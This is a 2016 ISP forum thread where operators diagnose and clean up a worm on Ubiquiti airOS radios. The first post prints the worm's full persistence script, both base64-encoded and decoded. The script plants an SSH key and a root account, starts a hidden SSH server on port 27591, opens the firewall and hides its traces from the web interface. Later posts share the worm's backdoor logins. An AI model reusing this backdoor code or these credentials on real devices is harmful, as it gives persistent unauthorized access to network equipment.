steelrat Опубліковано: 22 травня, 2016 Опубліковано: 22 травня, 2016 (відредаговано) ubnt@xxx.xxx.xxx.xxx's password: BusyBox v1.11.2 (2013-05-28 17:52:06 EEST) built-in shell (ash) Enter 'help' for a list of built-in commands. XM.v5.5.6# ls -lA -rw------- 1 ubnt admin 459 Apr 6 2012 dropbear_dss_host_key -rw------- 1 ubnt admin 427 Apr 6 2012 dropbear_rsa_host_key -rw------- 1 ubnt admin 20055 Dec 14 03:02 mf.tar -rwxr-xr-x 1 ubnt admin 1857 Dec 13 00:59 rc.prestart XM.v5.5.6# XM.v5.5.6# XM.v5.5.6# XM.v5.5.6# XM.v5.5.6# cat rc.prestart #!/bin/sh mkdir -p /var/bin cat << EOFEOFEOF | uudecode -o /var/bin/cgi - begin-base64 755 - IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1 R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0 Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp Jwo= ==== EOFEOFEOF chmod 755 /var/bin/cgi 2>/dev/null sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf ------------------------- Попробуем заглянуть внутрь... XM.v5.5.6# cat << EOFEOFEOF | uudecode -o /tmp/cgi - > begin-base64 755 - > IyEvYmluL3NoCmlmIFsgIiRIVFRQX0hPU1QiID0gImxvY2FsaG9zdC5sb2NhbG5ldCIgXTsgdGhl > bgoJUEFUSD0vYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjokUEFUSAoJZWNobyAic3NoLXJz > YSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERkY5NmwreTNod0hGSDJXNmF5VHE2TG5t > ZDFrTXFaRkI4L3Q0YVFvSmJIaXFsQitGaWhQL250c2gra3BSaHdDYTNlYUxENEFlZEJydnRvNnJM > ZGpOTVJqTlV4TzY3YWpPL2VrdDVqTFpQR3YxVFVmeE42OVUrWnY5aDBkMlo4Tk5BOWplbVpIRVR1 > R0IzOVlzN3hYYlR4RDZBSUw3WVRWN3BEM3cvdHdjQTIrbXVwWUJIRlBzMnVKUTZtNmZGNG0xODlH > QWttMVRVdHdhNDFoZjAySVFIZTBhQnQwS0dNNlM5YjRzNC9CNmRtOTErYkl5Q3I3bjVDWW5BVW8z > a0VzV20vaG1FOGNnUVFmeXpna21LRFFnWExRaE9DNDZMeUpZU1I1elpaNnJXN2s0UnppK0RtOW9w > Ny9FbU94TnUwR3BKV1pvVVZSOUlITTlxMitlY1ZZSUYiIDI+L2Rldi9udWxsID4+IC9ldGMvZHJv > cGJlYXIvYXV0aG9yaXplZF9rZXlzCgllY2hvICJhaXJ2aWV3OnVOT3dQWEd6eTlvZlk6MDowOkFp > clZpZXcgbWFuYWdlcjovZXRjL3BlcnNpc3RlbnQ6L2Jpbi9zaCIgMj4vZGV2L251bGwgPj4gL2V0 > Yy9wYXNzd2QKCglpZiBbICEgLWYgIi9ldGMvcGVyc2lzdGVudC9kcm9wYmVhcl9yc2FfaG9zdF9r > ZXkiIF07IHRoZW4KCQlkcm9wYmVhcmtleSAtdCByc2EgLXMgMTAyNCAtZiAvZXRjL3BlcnNpc3Rl > bnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5ID4vZGV2L251bGwgMj4mMQoJZmkKCglkcm9wYmVhciAt > YSAtciAvZXRjL3BlcnNpc3RlbnQvZHJvcGJlYXJfcnNhX2hvc3Rfa2V5IC1wIDI3NTkxIC1QIC9k > ZXYvbnVsbCAyPi9kZXYvbnVsbAoJaXB0YWJsZXMgLUkgSU5QVVQgLXAgdGNwIC0tZHBvcnQgMjIg > LWogQUNDRVBUCglpcHRhYmxlcyAtSSBJTlBVVCAtcCB0Y3AgLS1kcG9ydCAyNzU5MSAtaiBBQ0NF > UFQKZmkKCmdyZXAgLXYgLWkgImF1dGhvcml6ZWRfa2V5cyIgfCBncmVwIC12IC1pICJcL2V0Y1wv > cGFzc3dkIiB8IC9iaW4vY2dpICIke1NDUklQVF9GSUxFTkFNRX0iIHwgZ3JlcCAtRSAtdiAtaSAn > c3BhbiBjbGFzcy4qKGxhYmVsfHZhbHVlLipyZWQpLiooY3VzdG9tIHNjcmlwdHM6fGVuYWJsZWQp > Jwo= > ==== > EOFEOFEOF XM.v5.5.6# ls -l /tmp/cgi -rwxr-xr-x 1 ubnt admin 1142 Dec 17 03:33 /tmp/cgi XM.v5.5.6# cat /tmp/cgi #!/bin/sh if [ "$HTTP_HOST" = "localhost.localnet" ]; then PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFF96l+y3hwHFH2W6ayTq6Lnmd1kMqZFB8/t4aQoJbHiqlB+FihP/ntsh+kpRhwCa3eaLD4AedBrvto6rLdjNMRjNUxO67ajO/ekt5jLZPGv1TUfxN69U+Zv9h0d2Z8NNA9jemZHETuGB39Ys7xXbTxD6AIL7YTV7pD3w/twcA2+mupYBHFPs2uJQ6m6fF4m189GAkm1TUtwa41hf02IQHe0aBt0KGM6S9b4s4/B6dm91+bIyCr7n5CYnAUo3kEsWm/hmE8cgQQfyzgkmKDQgXLQhOC46LyJYSR5zZZ6rW7k4Rzi+Dm9op7/EmOxNu0GpJWZoUVR9IHM9q2+ecVYIF" 2>/dev/null >> /etc/dropbear/authorized_keys echo "airview:uNOwPXGzy9ofY:0:0:AirView manager:/etc/persistent:/bin/sh" 2>/dev/null >> /etc/passwd if [ ! -f "/etc/persistent/dropbear_rsa_host_key" ]; then dropbearkey -t rsa -s 1024 -f /etc/persistent/dropbear_rsa_host_key >/dev/null 2>&1 fi dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null iptables -I INPUT -p tcp --dport 22 -j ACCEPT iptables -I INPUT -p tcp --dport 27591 -j ACCEPT fi grep -v -i "authorized_keys" | grep -v -i "\/etc\/passwd" | /bin/cgi "${SCRIPT_FILENAME}" | grep -E -v -i 'span class.*(label|value.*red).*(custom scripts:|enabled)' XM.v5.5.6# netstat -nl Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN tcp 0 0 :::80 :::* LISTEN tcp 0 0 :::53 :::* LISTEN tcp 0 0 :::22 :::* LISTEN -------------- Однако не активен бэкдор... Тот который dropbear -a -r /etc/persistent/dropbear_rsa_host_key -p 27591 -P /dev/null 2>/dev/null Ибо if [ "$HTTP_HOST" = "localhost.localnet" ]; then Хм... Странный вирус... Или то не вирус? Походу активируется отсюда sed 's/\/bin\/cgi/\/var\/bin\/cgi/' /usr/etc/lighttpd/lighttpd.conf >> /etc/lighttpd.conf sed -i '/^include "\/usr\/etc\/lighttpd\/lighttpd.conf"$/d' /etc/lighttpd.conf Ну, собственно cgi.assign = ( "/ipscan.cgi" => "", "/signal.cgi" => "", "/status.cgi" => "", "/glogo.cgi" => "", "/status-new.cgi" => "", "/ifstats.cgi" => "", "/iflist.cgi" => "", "/air-view.cgi" => "", ".jnlp" => "/var/bin/cgi", ".cgi" => "/var/bin/cgi", ".sh" => "/bin/sh" ) host:~ # wget http://xxx.xxx.xxx.xxx/.cgi --2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/.cgi Connecting to xxx.xxx.xxx.xxx:80... connected. HTTP request sent, awaiting response... 302 Found Location: /cookiechecker?uri=/.cgi [following] --2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/cookiechecker?uri=/.cgi Reusing existing connection to xxx.xxx.xxx.xxx:80. HTTP request sent, awaiting response... 302 Found Location: /.cgi [following] --2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/.cgi Reusing existing connection to xxx.xxx.xxx.xxx:80. HTTP request sent, awaiting response... 302 Found Location: /login.cgi?uri=/.cgi [following] --2016-05-22 22:13:40-- http://xxx.xxx.xxx.xxx/login.cgi?uri=/.cgi Reusing existing connection to xxx.xxx.xxx.xxx:80. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: ‘.cgi’ .cgi [ <=> ] 2.85K --.-KB/s in 0.001s 2016-05-22 22:13:40 (1.92 MB/s) - ‘.cgi’ saved [2916] resolv:~ # cat .cgi <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Login</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta http-equiv="Cache-Control" content="no-cache"> <link rel="shortcut icon" href="/130528.1754/favicon.ico" > <link href="/130528.1754/login.css" rel="stylesheet" type="text/css"> <link href="/130528.1754/style.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="/130528.1754/js/jquery.js"></script> <script type="text/javascript" src="/130528.1754/util.js"></script> <script type="text/javascript" src="/130528.1754/index.js"></script> <script type="text/javascript" language="javascript"> //<!-- var globals = { first_login : false, postback : false, fixed : false, country : "" }; function onLangChange() { $("#lang_changed").val("yes"); $("#loginform").submit(); } function validateForm() { if ($("#lang_changed").val() == "yes") return true; if ($("#country").val() == "0") { $("#errmsg").text("Please select your country."); return false; } if (!$("#agreed").is(":checked")) { $("#errmsg").html("To use this product, you must agree to<br/>terms of use."); return false; } return true; } $(document).ready(function() { $("#username").focus(); cache_images([ 'main_top.png', 'main.png', 'link.png', 'net.png', '4dv.png', 'srv.png', 'system.png', 'border.gif', 'spectr.gif']); if (globals.first_login) { $("#ui_language").change(onLangChange); $("#loginform").submit(validateForm); if (!globals.postback && !globals.fixed) $("#country").val(0); else $("#country").val(globals.country); } }); //--> </script> </head> <body> <table border="0" cellpadding="0" cellspacing="0" align="center" class="loginsubtable"> <form enctype="multipart/form-data" id="loginform" method="post" action="/login.cgi"> <tr> <td valign="top"><img src="/130528.1754/images/airos_logo.png"></td> <td class="loginsep"> <input type="hidden" name="uri" id="uri" value="/.cgi" /> <table border="0" cellpadding="0" cellspacing="0" class="logintable" align="center"> <tr> <td colspan="2" align="center"> <div id="errmsg" class="error"> </div> </td> </tr> <tr> <td colspan="2"> </td> </tr> <tr> <td><label for="username">Username:</label></td> <td><input type="text" name="username" id="username" /></td> </tr> <tr> <td><label for="password">Password:</label></td> <td><input type="password" name="password" id="password" maxlength="8"/></td> </tr> <tr> <td colspan="2"> </td> </tr> </table> </td> </tr> <tr> <td> </td> <td class="submit" align="right"> <input type="submit" value="Login" /> </td> </tr> </form> </table> </body> </html> Т.е. запаролено... Без пароля бэкдор не запустить... Відредаговано 22 травня, 2016 steelrat
Интернетзависимый Опубліковано: 22 травня, 2016 Опубліковано: 22 травня, 2016 Господа, пожалуйста доступно объясните, чем конкретно чревато заражение данной порчей? Ибо после последних гроз в сети наблюдаю явный сглаз.
steelrat Опубліковано: 25 травня, 2016 Опубліковано: 25 травня, 2016 Переводит абонентскую точку из режима клиента в режим мастера и меняет название ssid. Закрывает доступ к web-интерфейсу. И начинает размножаться. Остается только ssh.
argus78 Опубліковано: 25 травня, 2016 Опубліковано: 25 травня, 2016 Переводит абонентскую точку из режима клиента в режим мастера и меняет название ssid. Закрывает доступ к web-интерфейсу. И начинает размножаться. Остается только ssh. Гм, а куда начинает размножаться? На клиентский компьютер? Вирю логичней оставлять тот же ссид, авось кто из соседей подконектится, тогда хоть будет куда разможаться.
steelrat Опубліковано: 25 травня, 2016 Опубліковано: 25 травня, 2016 Переводит абонентскую точку из режима клиента в режим мастера и меняет название ssid. Закрывает доступ к web-интерфейсу. И начинает размножаться. Остается только ssh. Гм, а куда начинает размножаться? На клиентский компьютер? Вирю логичней оставлять тот же ссид, авось кто из соседей подконектится, тогда хоть будет куда разможаться. На базовых точно начинает размножаться. Т.е. пытается сканировать и заражать другие адреса...
dan_aspire Опубліковано: 25 травня, 2016 Опубліковано: 25 травня, 2016 Похоже, вирь размножается именно на клиентских ПК, ибо у нас менеджмент влан - исключительно серые ипы без доступа в интернет - и те пострадали.
steelrat Опубліковано: 25 травня, 2016 Опубліковано: 25 травня, 2016 Похоже, вирь размножается именно на клиентских ПК, ибо у нас менеджмент влан - исключительно серые ипы без доступа в интернет - и те пострадали. А управление закрыто?
dan_aspire Опубліковано: 26 травня, 2016 Опубліковано: 26 травня, 2016 Похоже, вирь размножается именно на клиентских ПК, ибо у нас менеджмент влан - исключительно серые ипы без доступа в интернет - и те пострадали. А управление закрыто? с юзерских сеток туда достучаться реально. Извне - нет. Доступа к наружке нет, возможно из-за этого скрипты вируса с curlом не отработали.
sanyadnepr Опубліковано: 29 травня, 2016 Опубліковано: 29 травня, 2016 Т.е. запаролено... Без пароля бэкдор не запустить... А если маматрахаль логин/пароль подставить ?
sanyadnepr Опубліковано: 29 травня, 2016 Опубліковано: 29 травня, 2016 Похоже, вирь размножается именно на клиентских ПК, ибо у нас менеджмент влан - исключительно серые ипы без доступа в интернет - и те пострадали. Палюбому, у кого-то из клиентов был убнт девайс, аирроутер например, с белым айпи.
sanyadnepr Опубліковано: 29 травня, 2016 Опубліковано: 29 травня, 2016 Переводит абонентскую точку из режима клиента в режим мастера и меняет название ssid. Закрывает доступ к web-интерфейсу. И начинает размножаться. Остается только ssh. Гм, а куда начинает размножаться? На клиентский компьютер? Вирю логичней оставлять тот же ссид, авось кто из соседей подконектится, тогда хоть будет куда разможаться. На базовых точно начинает размножаться. Т.е. пытается сканировать и заражать другие адреса... Да, на базовых и клиентах начинает размножаться, без доступа к downloads.openwrt.org примерно с неделю зараженная точка, позаражала "серых" соседей, при этом клиента в АП не переводила, сеть работала только по отсутствию доступа к веб заметили. Если у кого то есть желание и возможность, зарядить детальную статистику(зеркалировать траф с порта), и выставить в МИР наживку, посмотреть что оно дальше делать будет.
kokasever Опубліковано: 12 липня, 2016 Опубліковано: 12 липня, 2016 Подскажите! Может кто знает? Какой логин пароль подкидывает вирус на зараженной ubnt
Ромка Опубліковано: 12 липня, 2016 Опубліковано: 12 липня, 2016 (відредаговано) Подскажите! Может кто знает? Какой логин пароль подкидывает вирус на зараженной ubntmotherfucker http://community.ubnt.com/t5/airMAX-General-Discussion/Virus-attack-URGENT-UBNT/m-p/1563635/highlight/true#M55060 ********************** Причина вирусной атаки - уволенный сотрудник, либо интегрированный агент компании конкурента. Пострадало оборудование - CPE либо AP устройства Ubiquiti имеющие белый IP адрес в глобальной сети Интернет (IPv4.PPPoE, IPv4.DHCP, IPv6). Цели вирусной атаки: 1. Нанесение вреда сети 2. Получение доступа к локальным сегментам транспортной сети 3. Борьба конкурентов 4. Получение доступа к локальной сети абонентов через прокси 5. Перехват трафика 6. Бесплатный доступ к радиосети Метод загрузки вредного кода - через скрипты lighttpd сервера CGI скрипты. Метод обеспечения работоспособности: 1. добавляется пользователь SSH под именем mother и паролем f u c k e r 2. Запускается служебный TCP socket прямой связи Ubiquiti очень виновата! Наша сеть, размером почти 4000 абонентов тоже пострадала - россия, алтайский край. Позор производителью оборудования! Отключаем везде lighttpd... В CGI скриптах index.cgi logo.cgi написан вредный код, загрузка вируса произвелась через эти скрипты по команде от злоумышленника Відредаговано 12 липня, 2016 Ромка
Strahxh Опубліковано: 9 вересня, 2016 Опубліковано: 9 вересня, 2016 Добрый день. Столкнулись и мы с этим вирусом. Расскажите плз, то что нужно перешивать антенны я понял, и то что вирус поразил веб интерфейс тоже. Но ssh отвечает, но пароль естественно не подходит. Некоторые пароли я попробовал (moth3r:f u c k e.3r ; mother f u c k e r ; moth3/fucker ; moth3r/fucker ; moth3r/fuck.3r ; moth3r/f u c k e r 2) но все это безуспешно. Я понимаю, что скорее всего придется всех абонов объехать. Но может кто то нашел как это сделать по сети. Антенны все в сети. Абоны инет получают, но зайти на антенны я не могу. Заранее спасибо
ux0qt Опубліковано: 15 вересня, 2016 Опубліковано: 15 вересня, 2016 Кому еще нужно. Сразу скриптом убикути http://www.ubnt.com/downloads/XN-fw-internal/tools/ubnt-CureMalware.zip https://community.ubnt.com/t5/airMAX-Updates-Blog/Important-Security-Notice-and-airOS-5-6-5-Release/ba-p/1565949 и сканировать и удалить прошить (3), потом пароли для входа Заход на устройство moth3/fuckermoth3r/fuckermoth3r/fuck.3r У меня было логин moth3r пароль fuck.3r , перепрошьется без компилянце тест, потом перепрошиваете 5.6.5-ст тут в разделе https://local.com.ua/forum/index.php?app=core&module=attach§ion=attach&attach_id=95827, но более удобно через AirControl .Post 4 http://asp24.com.ua/blog/ubiquiti-virus/
jock444 Опубліковано: 16 вересня, 2016 Опубліковано: 16 вересня, 2016 есть на писаный самостоятельный антивирус вводите логин пароль и рендж ip и ждете он чистит и закрывает все порты открывает 8080 порт и прописывает в iptables правила так я вылечил все антенны
Strahxh Опубліковано: 19 вересня, 2016 Опубліковано: 19 вересня, 2016 Пароли ( Типа moth3r fuck.3r) пробовал вводить, ругается... следовательно просканировать и излить устройства удаленно не возможно. Вы говорите об антивирусе, рендж ip и так далее, это я так понимаю то что написали производители, с ним тоже беда. Пароль и логин не подходит.
nordstream Опубліковано: 13 листопада, 2016 Опубліковано: 13 листопада, 2016 Новая напасть? Airgrid 5 стоит в качестве базовой. Дальше со слов оператора - звонит абон что нет инета, смотрит в биллинге и не видит точку клиента. Заходит на базовую через вебморду - ему сразу выдает на странице main вверху надпись типа (с его слов) не хватает физической памяти и типа для её очистки скачайте файл отсюда" (и линк на файл). Оператор файл не скачивал а тупо взял точку перегрузил удаленно. И привет! Веб морда отпала, на пинг отвечает, по телнету или ssh заходит но после ввода пароля сразу отпадает и пишет что коннект закрыт. База далеко, доедем только завтра. версия стояла 5.6.6. Кто сталкивался с такой фигней. вот такое выдает когда по ssh заходишь root@net:/root # ssh net@10.1.0.250 net@10.1.0.250's password: KM ,ok0KNWW KM :NMMMMMMMM KM .. WMMMMMMMMM KM KM WMMMMMMMMM KM KM WMMMMMMMMM KM KM .. WMMMMMMMMM KM .. KM WMMMMMMMMM KM KM KM WMMMMMMMMM KMNXWM KM WMMMMMMMMK KMMMMMKONM WMMMMMMMW KMMMMMMMMM WMMMMMMM x lMMMMMMMMM WMMMMMN xK MMMMMMMMMl ,WMMMP dXM: lMMMMMMMMx . ,,,aaadXMMd lNMMMMMMW: XOxolcclodOKMMMMWc lXMMMMMNc lMMMMMMMMMMMMNo. llONMMM0c lMMMMMMNOo' 'lMN;. lMWl' BusyBox v1.11.2 (2016-05-26 12:19:53 EEST) built-in shell (ash) Enter 'help' for a list of built-in commands. Connection to 10.1.0.250 closed.
sanyadnepr Опубліковано: 13 листопада, 2016 Опубліковано: 13 листопада, 2016 (відредаговано) Похоже умерла флешка. Заходит на базовую через вебморду - ему сразу выдает на странице main вверху надпись типа (с его слов) не хватает физической памяти и типа для её очистки скачайте файл отсюда" (и линк на файл).Это случайно не ссылка на скачать файл с самой убнтшки для отправки в дальнейшем в саппорт убнт ? Пусть скрин в следущий раз делает. Відредаговано 13 листопада, 2016 sanyadnepr
nordstream Опубліковано: 13 листопада, 2016 Опубліковано: 13 листопада, 2016 Похоже умерла флешка. Заходит на базовую через вебморду - ему сразу выдает на странице main вверху надпись типа (с его слов) не хватает физической памяти и типа для её очистки скачайте файл отсюда" (и линк на файл).Это случайно не ссылка на скачать файл с самой убнтшки для отправки в дальнейшем в саппорт убнт ? Пусть скрин в следущий раз делает. Да хрен его знает теперь что там было.
livalera Опубліковано: 14 листопада, 2016 Опубліковано: 14 листопада, 2016 Хочу сказать спасибо за выложенные пароли !! очень помогли ! Кому еще нужно. Сразу скриптом убикути http://www.ubnt.com/downloads/XN-fw-internal/tools/ubnt-CureMalware.zip https://community.ubnt.com/t5/airMAX-Updates-Blog/Important-Security-Notice-and-airOS-5-6-5-Release/ba-p/1565949 и сканировать и удалить прошить (3), потом пароли для входа Заход на устройство moth3/fuckermoth3r/fuckermoth3r/fuck.3r У меня было логин moth3r пароль fuck.3r , перепрошьется без компилянце тест, потом перепрошиваете 5.6.5-ст тут в разделе https://local.com.ua/forum/index.php?app=core&module=attach§ion=attach&attach_id=95827, но более удобно через AirControl .Post 4 http://asp24.com.ua/blog/ubiquiti-virus/
molecul Опубліковано: 22 листопада, 2016 Опубліковано: 22 листопада, 2016 Вот и нас постигла сия участь. Часть мостов и секторов пускают по вирусному логину и паролю. Беда еще в том, что мы используем скрипты (добавляем интерфейсы для вланов) и много где частоты из ct. Какая в таком случае последовательность действий по лечению вируса.
Paramotor Опубліковано: 22 листопада, 2016 Опубліковано: 22 листопада, 2016 Вот и нас постигла сия участь. Часть мостов и секторов пускают по вирусному логину и паролю. Беда еще в том, что мы используем скрипты (добавляем интерфейсы для вланов) и много где частоты из ct. Какая в таком случае последовательность действий по лечению вируса. Наверное сброс точки и ее перепрошив
Рекомендованные сообщения
Создайте аккаунт или войдите в него для комментирования
Вы должны быть пользователем, чтобы оставить комментарий
Создать аккаунт
Зарегистрируйтесь для получения аккаунта. Это просто!
Зарегистрировать аккаунтВхід
Уже зарегистрированы? Войдите здесь.
Войти сейчас